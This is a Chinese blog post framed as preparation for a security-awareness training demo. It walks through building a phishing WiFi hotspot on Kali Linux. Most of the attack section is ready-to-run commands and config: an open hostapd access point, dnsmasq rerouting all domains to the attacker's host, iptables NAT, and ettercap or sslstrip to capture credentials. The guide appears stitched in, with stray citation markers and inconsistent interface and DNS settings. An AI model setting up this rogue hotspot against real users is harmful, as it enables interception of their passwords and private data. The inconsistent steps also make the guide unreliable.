使用Kali自搭建钓鱼Wifi

营销部的张大熊安排了一次网络安全培训,需要演示WiFi钓鱼。阿旺回忆起在学校的经验,利用KaliLinux和USB网卡搭建钓鱼热点,经过一系列操作和调整,最终成功完成演示。这次经历让阿旺意识到电子资料管理的重要性。

  一天,营销部的张大熊跑到阿旺办公桌前,两脚岔开,手肘支在办公桌上,手掌撑着脸,像公司正在号召绿植竞赛的参赛盆栽。阿旺眼光只好从电脑分屏平移到他脸上。

  “阿旺啊,‘格物致知’这家做贸易的客户要做一个网络安全意识的培训,培训大纲已经沟通清楚了,不过这次培训还有一个现场表演,需要表演wifi钓鱼,我把你们拉到一个群里沟通一下吧。” 张大熊一脸期盼的说。

  阿旺心想:“安全意识培训之前我在学校读书时就跟老师一起做过,那是在校园网络安全宣传周活动上,老师负责讲解PPT,我负责演示wifi钓鱼。现在操作手册和无线钓鱼网卡都还在,这次可以在那个现成PPT和操作手册上迭代优化即可。”

  于是阿旺施展了甜笑功(甜甜一笑):“这个没问题啊,按照客户要求做吧,我先按照大纲出一版PPT发群里给客户看,然后录制一个demo。如果客户认可,我们就开拔客户现场培训”

  张大熊喜笑颜开,赶紧拿起手机把一堆人塞进了微信群,分别@做了介绍。阿旺在群里应对了几句,就在自己云盘上翻找,因为资料没有合理的进行归纳分类,文档散落在不同的文件夹,阿旺找了20来分钟才找到以前写的资料。阿旺痛定思痛,这次真的要好好把电子资料整理一下了。阿旺找到自己以前做的手册,原来之前用kali配合专门的USB网卡做了一个钓鱼wifi热点,凡是连接上这个热点的手机用户,其浏览的图片以及未加密传输的账号密码都能被kali软件捕捉到。然后阿旺把之前的操作手册又复现了一遍,避免现场出不来效果而尴尬,虽然中间又出了N多妖蛾子,但还是马马虎虎成功了。阿旺把这些过程又抄抄改改,整理如下:

一、原理说明

  这个实验使用linux(kali)建立无线热点,linux下的无线共享要用到两个软件:hostapd(创建无线热点)、dnsmasq(dns服务和dhcp服务),然后需要一个物理的无线网卡。这个比windows麻烦一点,windows的话就是开启网络共享

### Kali Linux 中搭建钓鱼 WiFi 的详细步骤 #### 1. ### 安装必要的软件包 在 Kali Linux 中,需要安装两个主要的工具来实现钓鱼 WiFi:`hostapd` 和 `dnsmasq`。这两个工具分别用于创建无线热点和提供 DNS/DHCP 服务。 执行以下命令以安装这些工具: ```bash apt update && apt install hostapd dnsmasq -y ``` --- #### 2. ### 配置 `hostapd` 编辑 `/etc/hostapd/hostapd.conf` 文件,添加以下内容以定义无线热点的基本参数: ```plaintext interface=at0 # 使用的虚拟接口名 driver=nl80211 # 驱动程序类型 ssid=Free_WiFi # 热点名称 hw_mode=g # Wi-Fi 模式 (g 表示 2.4GHz) channel=6 # 工作信道 macaddr_acl=0 # 不启用 MAC 地址过滤 auth_algs=1 # 认证算法 ignore_broadcast_ssid=0 # 不隐藏 SSID wpa=0 # 关闭 WPA 加密 ``` 保存文件后,确保 `hostapd` 能够识别此配置文件路径。可以修改 `/etc/default/hostapd` 文件中的 `DAEMON_CONF` 参数指向刚才创建的配置文件: ```plaintext DAEMON_CONF="/etc/hostapd/hostapd.conf" ``` --- #### 3. ### 配置 `dnsmasq` 编辑 `/etc/dnsmasq.conf` 文件,清空原有内容并替换为以下配置: ```plaintext interface=at0 # 绑定到虚拟接口 at0 dhcp-range=192.168.1.100,192.168.1.200,12h # 动态分配 IP 地址范围及租期 server=8.8.8.8 # Google Public DNS domain-needed # 只解析带有域名的部分请求 bogus-priv # 忽略私有反向查找区域 no-resolv # 不读取系统的 resolv.conf 文件 address=/#/192.168.1.1 # 将所有未匹配的域名重定向至本地网关 ``` 上述配置实现了 DHCP 和 DNS 服务的功能,并将所有未知主机名的请求重定向到网关地址(即攻击者的机器)[^4]。 --- #### 4. ### 启用 IP 转发功能 为了让客户端设备能够访问互联网,需启用内核级别的 IP 转发功能。执行以下命令: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` 为了使该设置永久生效,可编辑 `/etc/sysctl.conf` 文件,取消注释或添加以下行: ```plaintext net.ipv4.ip_forward=1 ``` 随后应用更改: ```bash sysctl -p ``` --- #### 5. ### 设置 NAT 规则 使用 `iptables` 来配置网络地址转换(NAT),以便将来自客户端的数据流转发到外部网络。假设当前联网的物理接口为 `eth0`,执行以下命令: ```bash iptables --flush # 清除现有规则 iptables --table nat --flush # 清除 NAT 表中的规则 iptables --delete-chain # 删除自定义链 iptables --table nat --delete-chain # 添加 MASQUERADE 规则 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i eth0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -i at0 -o eth0 -j ACCEPT ``` 以上规则确保了数据可以从虚拟接口 `at0` 正确路由到外网接口 `eth0`[^3]。 --- #### 6. ### 启动服务 依次启动 `hostapd` 和 `dnsmasq` 服务: ```bash service hostapd start service dnsmasq start ``` 如果一切正常,此时应该可以看到一个名为 `Free_WiFi` 的开放热点可供连接。 --- #### 7. ### 测试与验证 当目标设备连接到伪造的热点时,所有的 HTTP 请求都会被重定向到攻击者控制的页面。可以通过捕获流量进一步分析用户的敏感信息。 例如,利用 `ettercap` 或 `sslstrip` 工具拦截 HTTPS 数据流,从而获取潜在的登录凭证或其他隐私数据。 --- ### 注意事项 - **合法性**:在实际环境中部署此类技术之前,请务必确认拥有合法授权。 - **硬件兼容性**:并非所有无线网卡都支持 AP 模式。建议提前测试所选设备是否满足条件。 - **安全性风险**:不当操作可能导致系统不稳定甚至违反法律条款,谨慎行事! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值